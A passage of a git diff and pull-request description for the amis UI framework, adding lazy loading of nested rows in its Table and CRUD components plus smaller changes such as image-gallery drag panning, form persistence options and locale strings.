initChildren(item.children, depth, index, id, `${path}${index}.`) + : [] + }; + }); +} + export const Column = types .model('Column', { label: types.optional(types.frozen(), undefined), @@ -127,20 +166,33 @@ export const Row = types rowSpans: types.frozen({} as any), index: types.number, newIndex: types.number, - nth: 0, path: '', // 行数据的位置 - expandable: false, checkdisable: false, isHover: false, children: types.optional( types.array(types.late((): IAnyModelType => Row)), [] ), + defer: false, // 是否为懒数据 + loaded: false, // 懒数据是否加载完了 + loading: false, // 懒数据是否正在加载 + error: '', // 懒数据加载失败的错误信息 depth: types.number, // 当前children位于第几层,便于使用getParent获取最顶层TableStore appeared: true, lazyRender: false }) .views(self => ({ + get expandable(): boolean { + let table: any; + return !!( + (self && self.children.length) || + (self && self.defer && !self.loaded) || + ((table = getParent(self, self.depth * 2) as any) && + table.footable && + table.footableColumns.length) + ); + }, + get checked(): boolean { return (getParent(self, self.depth * 2) as ITableStore).isSelected( self as IRow @@ -320,36 +372,70 @@ export const Row = types }); if (Array.isArray(data.children)) { - const arr = data.children; - const pool = arr.concat(); + this.replaceChildren(data.children); + } + }, - // 把多的删了先 - if (self.children.length > arr.length) { - self.children.splice(arr.length, self.children.length - arr.length); - } + replaceChildren(children: Array<any>) { + const arr = children; + const pool = arr.concat(); - let index = 0; - const len = self.children.length; - while (pool.length) { - // 因为父级id未更新,所以需要将子级的parentId正确指向父级id - const item = { - ...pool.shift(), - parentId: self.id - }!; - - if (index < len) { - self.children[index].replaceWith(item); - } else { - const row = Row.create(item); - self.children.push(row); - } - index++; + // 把多的删了先 + if (self.children.length > arr.length) { + self.children.splice(arr.length, self.children.length - arr.length); + } + + let index = 0; + const len = 
self.children.length; + while (pool.length) { + // 因为父级id未更新,所以需要将子级的parentId正确指向父级id + const item = { + ...pool.shift(), + parentId: self.id + }!; + + if (index < len) { + self.children[index].replaceWith(item); + } else { + const row = Row.create(item); + self.children.push(row); } + index++; } }, markAppeared(value: any) { value && (self.appeared = !!value); + }, + + markLoading(value: any) { + self.loading = !!value; + }, + + markLoaded(value: any) { + self.loaded = !!value; + }, + + setError(value: any) { + self.error = String(value); + }, + + resetDefered() { + self.error = ''; + self.loaded = false; + }, + + setDeferData({children, ...rest}: any) { + self.data = { + ...self.data, + ...rest + }; + + if (Array.isArray(children)) { + this.replaceChildren( + initChildren(children, self.depth, self.index, self.id, self.path) + ); + } } })); @@ -1238,55 +1324,6 @@ export const TableStore = iRendererStore return combineCell(arr, keys); } - function initChildren( - children: Array<any>, - depth: number, - pindex: number, - parentId: string, - path: string = '', - nThRef: {index: number} - ): any { - depth += 1; - return children.map((item, index) => { - item = isObject(item) - ? item - : { - item - }; - const id = item.__id ?? guid(); - - return { - // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), - id: String(id), - parentId: String(parentId), - key: String(`${pindex}-${depth}-${index}`), - path: `${path}${index}`, - depth: depth, - index: index, - nth: nThRef.index++, - newIndex: index, - pristine: item, - data: item, - rowSpans: {}, - children: - item && Array.isArray(item.children) - ? 
initChildren( - item.children, - depth, - index, - id, - `${path}${index}.`, - nThRef - ) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) - }; - }); - } - function initRows( rows: Array<any>, getEntryId?: (entry: any, index: number) => string, @@ -1298,7 +1335,6 @@ export const TableStore = iRendererStore /* 避免输入内容为非数组挂掉 */ rows = !Array.isArray(rows) ? [] : rows; - const nThRef = {index: 0}; let arr: Array<SRow> = rows.map((item, index) => { if (!isObject(item)) { item = { @@ -1315,20 +1351,18 @@ export const TableStore = iRendererStore key: String(`${index}-1-${index}`), depth: 1, // 最大父节点默认为第一层,逐层叠加 index: index, - nth: nThRef.index++, newIndex: index, pristine: item, path: `${index}`, data: item, rowSpans: {}, + defer: !!item.defer, + loaded: false, + loading: false, children: item && Array.isArray(item.children) - ? initChildren(item.children, 1, index, id, `${index}.`, nThRef) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) + ? 
initChildren(item.children, 1, index, id, `${index}.`) + : [] }; }); @@ -1342,7 +1376,9 @@ export const TableStore = iRendererStore } replaceRow(arr, reUseRow); - self.isNested = self.rows.some(item => item.children.length); + self.isNested = self.rows.some( + item => item.children.length || (item.defer && !item.loaded) + ); // 前 20 个直接渲染,后面的按需渲染 if ( diff --git a/packages/amis-core/src/types.ts b/packages/amis-core/src/types.ts index 0133ae7d9..683a4406c 100644 --- a/packages/amis-core/src/types.ts +++ b/packages/amis-core/src/types.ts @@ -228,6 +228,11 @@ export interface ApiObject extends BaseApiObject { api: ApiObject, context: any ) => ApiObject | Promise<ApiObject>; + /** + * api 发送上下文,可以用来传递一些数据给 api 的 adaptor + * @readonly + */ + context?: any; /** 是否过滤为空字符串的 query 参数 */ filterEmptyQuery?: boolean; downloadFileName?: string; diff --git a/packages/amis-core/src/utils/api.ts b/packages/amis-core/src/utils/api.ts index bfea52cc4..e3f7004b8 100644 --- a/packages/amis-core/src/utils/api.ts +++ b/packages/amis-core/src/utils/api.ts @@ -478,6 +478,7 @@ export function wrapFetcher( options?: object ) { api = buildApi(api, data, options) as ApiObject; + (api as ApiObject).context = data; if (api.requestAdaptor) { debug('api', 'before requestAdaptor', api); diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 
避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index 10969f1b1..476171f7c 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -56,7 +56,7 @@ export function findOrCreateStyle(id: string, doc?: Document) { } export function insertStyle(style: string, id: string, doc?: Document) { - const varStyleTag = findOrCreateStyle(id, doc); + const varStyleTag = findOrCreateStyle('amis-' + id, doc); // bca-disable-line varStyleTag.innerHTML = style; @@ -348,7 +348,7 @@ export interface InsertCustomStyle { */ export function removeCustomStyle(type: string, id: string, doc?: Document) { const style = (doc || document).getElementById( - (type ? type + '-' : '') + id.replace('u:', '') + 'amis-' + (type ? 
type + '-' : '') + id.replace('u:', '') ); if (style) { style.remove(); diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index 1c8e0d49e..ddf531ec2 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -1,7 +1,7 @@ import cx from 'classnames'; import flatten from 'lodash/flatten'; import cloneDeep from 'lodash/cloneDeep'; -import {isObject} from 'amis-core'; +import {isObject, getRendererByName} from 'amis-core'; import { BasePlugin, tipedLabel, @@ -783,29 +783,61 @@ export class FormPlugin extends BasePlugin { '设置后将让表单的第一个可输入的表单项获得焦点' ) }), - { - type: 'ae-switch-more', - mode: 'normal', + getSchemaTpl('switch', { name: 'persistData', label: tipedLabel( '本地缓存', '开启后,表单的数据会缓存在浏览器中,切换页面或关闭弹框不会清空当前表单内的数据' ), - hiddenOnDefault: true, - formType: 'extend', - form: { - body: [ - getSchemaTpl('switch', { - name: 'clearPersistDataAfterSubmit', - label: tipedLabel( - '提交成功后清空缓存', - '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' - ), - pipeIn: defaultValue(false), - visibleOn: 'data.persistData' - }) - ] - } + pipeIn: (value: boolean | string | undefined) => !!value + }), + { + type: 'container', + className: 'ae-ExtendMore mb-3', + visibleOn: 'data.persistData', + body: [ + getSchemaTpl('tplFormulaControl', { + name: 'persistData', + label: tipedLabel( + '持久化Key', + '使用静态数据或者变量:<code>"\\${id}"</code>,来为Form指定唯一的Key' + ), + pipeIn: (value: boolean | string | undefined) => + typeof value === 'string' ? value : '' + }), + { + type: 'input-array', + label: tipedLabel( + '保留字段集合', + '如果只需要保存Form中的部分字段值,请配置需要保存的字段名称集合,留空则保留全部字段' + ), + name: 'persistDataKeys', + items: { + type: 'input-text', + placeholder: '请输入字段名', + options: flatten(schema?.body ?? schema?.controls ?? []) + .map((item: Record<string, any>) => { + const isFormItem = getRendererByName( + item?.type + )?.isFormItem; + + return isFormItem && typeof item?.name === 'string' + ? 
{label: item.name, value: item.name} + : false; + }) + .filter(Boolean) + }, + itemClassName: 'bg-transparent' + }, + getSchemaTpl('switch', { + name: 'clearPersistDataAfterSubmit', + label: tipedLabel( + '提交成功后清空缓存', + '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' + ), + pipeIn: defaultValue(false) + }) + ] }, getSchemaTpl('switch', { name: 'canAccessSuperData', diff --git a/packages/amis-editor/src/plugin/Form/InputDate.tsx b/packages/amis-editor/src/plugin/Form/InputDate.tsx index 8c56e150c..62c80d2a5 100644 --- a/packages/amis-editor/src/plugin/Form/InputDate.tsx +++ b/packages/amis-editor/src/plugin/Form/InputDate.tsx @@ -293,7 +293,7 @@ export class DateControlPlugin extends BasePlugin { form.setValues({ placeholder: DateType[type]?.placeholder, - valueFormat: type === 'time' ? 'HH:mm' : 'X', + valueFormat: 'X', displayFormat: DateType[type]?.format, minDate: '', maxDate: '', @@ -308,7 +308,7 @@ export class DateControlPlugin extends BasePlugin { '值格式', '提交数据前将根据设定格式化数据,请参考 <a href="https://momentjs.com/" target="_blank">moment</a> 中的格式用法。' ), - pipeIn: defaultValue('YYYY-MM-DD'), + pipeIn: defaultValue('X'), clearable: true, onChange: ( value: string, diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = 
options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const filterKeys = Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/_image-gallery.scss b/packages/amis-ui/scss/components/_image-gallery.scss index 54dfee091..ad4c2b075 100644 --- a/packages/amis-ui/scss/components/_image-gallery.scss +++ b/packages/amis-ui/scss/components/_image-gallery.scss @@ -54,13 +54,22 @@ justify-content: center; align-items: center; user-select: none; + overflow: hidden; > img { + cursor: move; + cursor: -webkit-grab; display: block; max-width: 100%; max-height: 100%; transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s; } + + &.is-dragging > img { + transition: none; + user-select: none; + cursor: -webkit-grabbing; + } } &-prevBtn, @@ -216,6 +225,7 @@ .#{$ns}ImageGallery-toolbar { background-color: var(--image-images-preview-bgColor); 
border-radius: var(--image-images-preview-radius); + box-shadow: 0 2px 6px 0 rgba(211, 211, 211, 0.5); display: flex; align-items: flex-start; padding: var(--image-images-preview-paddingTop) diff --git a/packages/amis-ui/scss/components/_table.scss b/packages/amis-ui/scss/components/_table.scss index b0976d487..d93fd7ab9 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -620,6 +620,10 @@ > thead > tr > th.#{$ns}Table-primayCell, > tbody > tr > td.#{$ns}Table-primayCell { white-space: nowrap; // 树形表格展示标题栏,不要换行 + + > .#{$ns}Spinner { + vertical-align: middle; + } } } @@ -864,6 +868,14 @@ } } + &-retryBtn { + color: var(--Form-feedBack-color); + cursor: pointer; + &:hover { + color: var(--Form-feedBack-color); + } + } + &-expandBtn, &-expandBtn2 { position: relative; diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/ImageGallery.tsx b/packages/amis-ui/src/components/ImageGallery.tsx index 9500ede08..1dda61f62 100644 --- a/packages/amis-ui/src/components/ImageGallery.tsx +++ b/packages/amis-ui/src/components/ImageGallery.tsx @@ -49,6 +49,14 @@ export interface ImageGalleryState { scale: number; /** 图片旋转角度 */ rotate: number; + /** + * 水平位移 + */ + tx: number; + /** + * 垂直位移 + */ + ty: number; /** 是否开启操作栏 */ showToolbar?: boolean; /** 是否显示底部图片集 */ @@ -89,6 +97,8 @@ export class ImageGallery extends React.Component< isOpened: 
false, index: -1, items: [], + tx: 0, + ty: 0, scale: 1, rotate: 0, showToolbar: false, @@ -103,8 +113,10 @@ export class ImageGallery extends React.Component< ref.addEventListener('wheel', this.onWheelScroll, { passive: false }); + ref.addEventListener('mousedown', this.onMouseDown); } else { this.galleryMain?.removeEventListener('wheel', this.onWheelScroll); + this.galleryMain?.removeEventListener('mousedown', this.onMouseDown); } this.galleryMain = ref; @@ -128,6 +140,38 @@ export class ImageGallery extends React.Component< } } + startX = 0; + startY = 0; + startTx = 0; + startTy = 0; + + @autobind + onMouseDown(event: MouseEvent) { + this.galleryMain?.classList.add('is-dragging'); + document.body.addEventListener('mousemove', this.onMouseMove); + document.body.addEventListener('mouseup', this.onMouseUp); + + this.startX = event.clientX; + this.startY = event.clientY; + this.startTx = this.state.tx; + this.startTy = this.state.ty; + } + + @autobind + onMouseMove(event: MouseEvent) { + this.setState({ + tx: this.startTx + event.clientX - this.startX, + ty: this.startTy + event.clientY - this.startY + }); + } + + @autobind + onMouseUp() { + this.galleryMain?.classList.remove('is-dragging'); + document.body.removeEventListener('mousemove', this.onMouseMove); + document.body.removeEventListener('mouseup', this.onMouseUp); + } + @autobind handleImageEnlarge(info: { src: string; @@ -151,6 +195,10 @@ export class ImageGallery extends React.Component< this.setState({ isOpened: true, + tx: 0, + ty: 0, + rotate: 0, + scale: 1, items: info.list ? 
info.list : [info], index: info.index || 0, /* children组件可以控制工具栏的展示 */ @@ -207,23 +255,35 @@ export class ImageGallery extends React.Component< switch (action.key) { case ImageActionKey.ROTATE_LEFT: - this.setState(prevState => ({rotate: prevState.rotate - 90})); + this.setState(prevState => ({ + rotate: prevState.rotate - 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ROTATE_RIGHT: - this.setState(prevState => ({rotate: prevState.rotate + 90})); + this.setState(prevState => ({ + rotate: prevState.rotate + 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_IN: - this.setState(prevState => ({scale: prevState.scale + 0.5})); + this.setState(prevState => ({ + scale: prevState.scale + 0.5, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_OUT: this.setState(prevState => { return prevState.scale - 0.5 > 0 - ? {scale: prevState.scale - 0.5} + ? {scale: prevState.scale - 0.5, tx: 0, ty: 0} : null; }); break; case ImageActionKey.SCALE_ORIGIN: - this.setState(() => ({scale: 1})); + this.setState(() => ({scale: 1, tx: 0, ty: 0})); break; } @@ -280,6 +340,8 @@ export class ImageGallery extends React.Component< items, rotate, scale, + tx, + ty, showToolbar, enlargeWithGallary, actions, @@ -320,8 +382,11 @@ export class ImageGallery extends React.Component< ref={this.galleryMainRef} > <img + draggable={false} src={items[index].originalSrc} - style={{transform: `scale(${scale}) rotate(${rotate}deg)`}} + style={{ + transform: `translate(${tx}px, ${ty}px) scale(${scale}) rotate(${rotate}deg)` + }} /> {showToolbar && Array.isArray(actions) && actions.length > 0 diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import 
VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? 
( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null} diff --git a/packages/amis-ui/src/locale/de-DE.ts b/packages/amis-ui/src/locale/de-DE.ts index 2e687fabe..0d685fb5a 100644 --- a/packages/amis-ui/src/locale/de-DE.ts +++ b/packages/amis-ui/src/locale/de-DE.ts @@ -197,6 +197,8 @@ register('de-DE', { 'Options.editLabel': 'Bearbeiten {{label}}', 'Options.label': 'Option', 'Options.createFailed': 'Erstellen fehlgeschlagen', + 'Options.retry': + "Laden fehlgeschlagen '{{reason}}', klicken Sie auf Wiederholen", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Eingabe', 'placeholder.noData': 'Keine Daten', diff --git a/packages/amis-ui/src/locale/en-US.ts b/packages/amis-ui/src/locale/en-US.ts index 605c4884f..481361a3b 100644 --- a/packages/amis-ui/src/locale/en-US.ts +++ b/packages/amis-ui/src/locale/en-US.ts @@ -189,6 +189,7 @@ register('en-US', { 'Options.editLabel': 'Edit {{label}}', 'Options.label': 'option', 'Options.createFailed': 'create failed, please check', + 'Options.retry': "Loading failed '{{reason}}', click retry", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Enter', 'placeholder.noData': 'No data', diff --git a/packages/amis-ui/src/locale/zh-CN.ts b/packages/amis-ui/src/locale/zh-CN.ts index ccea50181..95e19b697 100644 --- a/packages/amis-ui/src/locale/zh-CN.ts +++ b/packages/amis-ui/src/locale/zh-CN.ts @@ -194,6 +194,7 @@ register('zh-CN', { 'Options.editLabel': '编辑{{label}}', 'Options.label': '选项', 'Options.createFailed': '新增失败,请仔细检查', + 'Options.retry': '加载失败「{{reason}}」,点击重试', 'placeholder.empty': '<空>', 'placeholder.enter': '请输入', 'placeholder.noData': '暂无数据', diff --git 
a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index d453d176b..a140cf8d3 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -132,6 +132,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { */ api?: SchemaApi; + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; + /** * 批量操作 */ diff --git a/packages/amis/src/renderers/Table/Cell.tsx b/packages/amis/src/renderers/Table/Cell.tsx index 293974224..9da470971 100644 --- a/packages/amis/src/renderers/Table/Cell.tsx +++ b/packages/amis/src/renderers/Table/Cell.tsx @@ -9,7 +9,7 @@ import { buildTrackExpression, evalTrackExpression } from 'amis-core'; -import {BadgeObject, Checkbox, Icon} from 'amis-ui'; +import {BadgeObject, Checkbox, Icon, Spinner} from 'amis-ui'; import React from 'react'; export interface CellProps extends ThemeProps { @@ -32,6 +32,7 @@ export interface CellProps extends ThemeProps { popOverContainer?: any; quickEditFormRef: any; onImageEnlarge?: any; + translate: (key: string, ...args: Array<any>) => string; } export default function Cell({ @@ -51,7 +52,8 @@ export default function Cell({ onDragStart, popOverContainer, quickEditFormRef, - onImageEnlarge + onImageEnlarge, + translate: __ }: CellProps) { if (column.name && item.rowSpans[column.name] === 0) { return null; @@ -134,7 +136,18 @@ export default function Cell({ /> ); prefix.push( - item.expandable ? ( + item.loading ? ( + <Spinner key="loading" size="sm" show /> + ) : item.error ? ( + <a + className={cx('Table-retryBtn')} + key="retryBtn" + onClick={item.resetDefered} + data-tooltip={__('Options.retry', {reason: item.error})} + > + <Icon icon="retry" className="icon" /> + </a> + ) : item.expandable ? ( <a key="expandBtn2" className={cx('Table-expandBtn2', item.expanded ? 
'is-active' : '')} @@ -169,7 +182,13 @@ export default function Cell({ ); } return [prefix, affix, addtionalClassName]; - }, [item.expandable, item.expanded, column.isPrimary]); + }, [ + item.expandable, + item.expanded, + item.error, + item.loading, + column.isPrimary + ]); // 根据条件缓存 data,避免孩子重复渲染 const hasCustomTrackExpression = diff --git a/packages/amis/src/renderers/Table/TableRow.tsx b/packages/amis/src/renderers/Table/TableRow.tsx index 388dc063e..83434f74c 100644 --- a/packages/amis/src/renderers/Table/TableRow.tsx +++ b/packages/amis/src/renderers/Table/TableRow.tsx @@ -60,6 +60,8 @@ export class TableRow extends React.PureComponent< depth: number; expandable: boolean; appeard?: boolean; + loading?: boolean; + error?: string; checkdisable: boolean; trRef?: React.Ref<any>; isNested?: boolean; @@ -362,6 +364,8 @@ export default observer((props: TableRowProps) => { depth={item.depth} expandable={item.expandable} checkdisable={item.checkdisable} + loading={item.loading} + error={item.error} // data 在 TableRow 里面没有使用,这里写上是为了当列数据变化的时候 TableRow 重新渲染, // 不是 item.locals 的原因是 item.locals 会变化多次,比如父级上下文变化也会进来,但是 item.data 只会变化一次。 data={canAccessSuperData ? 
item.locals : item.data} diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 59f43d2d6..cee5ca66d 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -7,7 +7,8 @@ import { SchemaExpression, position, animation, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + isEffectiveApi } from 'amis-core'; import {Renderer, RendererProps} from 'amis-core'; import {SchemaNode, ActionObject, Schema} from 'amis-core'; @@ -71,6 +72,7 @@ import ColGroup from './ColGroup'; import debounce from 'lodash/debounce'; import AutoFilterForm from './AutoFilterForm'; import Cell from './Cell'; +import {reaction} from 'mobx'; /** * 表格列,不指定类型时默认为文本类型。 @@ -343,6 +345,11 @@ export interface TableSchema extends BaseSchema { * table layout */ tableLayout?: 'fixed' | 'auto'; + + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; } export interface TableProps extends RendererProps, SpinnerExtraProps { @@ -640,6 +647,18 @@ export default class Table extends React.Component<TableProps, object> { formItem && isAlive(formItem) && formItem.setSubStore(store); Table.syncRows(store, this.props, undefined) && this.syncSelected(); + + this.toDispose.push( + reaction( + () => + store + .getExpandedRows() + .filter( + row => row.defer && !row.loaded && !row.loading && !row.error + ), + (rows: Array<IRow>) => rows.forEach(this.loadDeferredRow) + ) + ); } static syncRows( @@ -711,6 +730,34 @@ export default class Table extends React.Component<TableProps, object> { } } + @autobind + async loadDeferredRow(row: IRow) { + const {env} = this.props; + const deferApi = row.data.deferApi || this.props.deferApi; + + if (!isEffectiveApi(deferApi)) { + throw new Error('deferApi is required'); + } + + try { + row.markLoading(true); + + const response = await env.fetcher(deferApi, row.locals); + if (!response.ok) { + throw new 
Error(response.msg); + } + + row.setDeferData(response.data); + row.markLoaded(true); + row.setError(''); + } catch (e) { + row.setError(e.message); + env.notify('error', e.message); + } finally { + row.markLoading(false); + } + } + /** * 自动设置表格高度占满界面剩余区域 * 用 css 实现有点麻烦,要改很多结构,所以先用 dom hack 了,避免对之前的功能有影响 @@ -2024,7 +2071,8 @@ export default class Table extends React.Component<TableProps, object> { checkOnItemClick, popOverContainer, canAccessSuperData, - itemBadge + itemBadge, + translate } = this.props; return ( @@ -2047,6 +2095,7 @@ export default class Table extends React.Component<TableProps, object> { popOverContainer={this.getPopOverContainer} quickEditFormRef={this.subFormRef} onImageEnlarge={this.handleImageEnlarge} + translate={translate} /> ); }
feat: CRUD & Table 嵌套支持懒加载 Close: #8411 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> This pull request adds a new feature to the `Table` and `CRUD` components that allows loading nested data lazily using the `deferApi` property. It also improves the appearance and usability of the components when loading data asynchronously, and adds localization support for the retry button tooltip. It updates the documentation and examples to reflect the new feature and fixes some minor formatting issues. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> > _Sing, O Muse, of the mighty `Table` component, the pride of `amis-ui`,_ > _Which can load nested data with lazy grace, using the `deferApi` property._ > _Like the Hydra, whose heads sprang forth anew when severed by Heracles,_ > _So the `Table` expands its rows with spinners and buttons, fetching data from sources._ ### Why Close: #8411 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 8d09692</samp> * Add nested and lazy loading feature for CRUD and Table components ([link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-95eedf8e35f124d56f35a016c1df591c4070cb9aff56cfefc58b33512de87653R586-R640), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-c1e292113137100e48b28863e77748e5f3bc137887515cbc8bc714c855ca982dL5-R7), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR42-R80), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cL130-R169), [link](https://github.com/baidu/amis/pull/8517/files?diff=unified&w=0#diff-ae98aab16ce6e5aab35f5adf3debffd7a84d243bf69a51f82c78e6ea57ef0a2cR176-R179), 
